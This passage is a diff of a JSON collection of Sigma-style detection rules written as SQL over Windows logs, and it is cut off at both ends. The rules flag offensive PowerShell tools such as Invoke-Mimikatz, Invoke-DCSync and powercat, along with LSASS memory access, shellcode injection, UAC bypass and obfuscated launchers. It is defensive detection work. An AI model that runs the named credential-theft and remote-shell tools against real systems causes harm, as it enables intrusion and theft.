'%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" + "filename": "posh_ps_malicious_commandlets.yml" }, { - "title": "SysmonEnte Usage", - "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", - "status": "experimental", - "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Credential Prompt", + "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "status": "test", + "description": "Detects PowerShell calling a credential prompt", + "author": "John Lambert (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.credential_access", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" ], - "filename": "proc_access_win_hack_sysmonente.yml" + "filename": "posh_ps_prompt_credentials.yml" }, { - "title": "Suspicious LSASS Access Via MalSecLogon", - "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", - "status": "experimental", - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "title": "Request A Single Ticket via PowerShell", + "id": "a861d835-af37-4930-bcd6-5b178bfb54df", + "status": "test", + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_seclogon.yml" + "filename": "posh_ps_request_kerberos_ticket.yml" }, { - "title": "Potential Svchost Memory Access", - "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", + "id": "e54f5149-6ba3-49cf-b153-070d24679126", "status": "experimental", - "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", - "author": "Tim Burrell", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "proc_access_win_invoke_phantom.yml" + "filename": "posh_ps_invoke_obfuscation_via_var.yml" }, { - "title": "Lsass Memory Dump via Comsvcs DLL", - "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", - "status": "test", - "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", + "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" ], - "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + "filename": "posh_ps_invoke_obfuscation_stdin.yml" }, { - "title": "UAC Bypass Using WOW64 Logger DLL Hijack", - "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", + "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "proc_access_win_uac_bypass_wow64_logger.yml" + "filename": "posh_ps_invoke_obfuscation_var.yml" }, { - "title": "Potential Shellcode Injection", - "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "title": "Disable Powershell Command History", + "id": "602f5669-6927-4688-84db-0d4b7afb2150", "status": "experimental", - "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", - "author": "Bhabesh Raj", + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", + "author": "Ali Alwashali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1070.003" ], "falsepositives": [ - "Unknown" + "Legitimate script that disables the command history" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" ], - "filename": "proc_access_win_shellcode_inject_msf_empire.yml" + "filename": "posh_ps_disable_psreadline_command_history.yml" }, { - "title": "CMSTP Execution Process Access", - "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", + "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.003", + "attack.t1027", "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%cmlua.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "proc_access_win_cmstp_execution_by_access.yml" + "filename": "posh_ps_invoke_obfuscation_clip.yml" }, { - "title": "Credential Dumping Tools Accessing LSASS Memory", - "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", - "status": "experimental", - "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", + "title": "Create Volume Shadow Copy with Powershell", + "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "status": "test", + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" + "attack.t1003.003" ], "falsepositives": [ - "Likely" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" ], - "filename": "proc_access_win_cred_dump_lsass_access.yml" + "filename": "posh_ps_create_volume_shadow_copy.yml" }, { - "title": "CobaltStrike BOF Injection Pattern", - "id": "09706624-b7f6-455d-9d02-adee024cee1d", - "status": "test", - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "author": "Christian Burkard (Nextron Systems)", + "title": "Tamper Windows Defender - ScriptBlockLogging", + 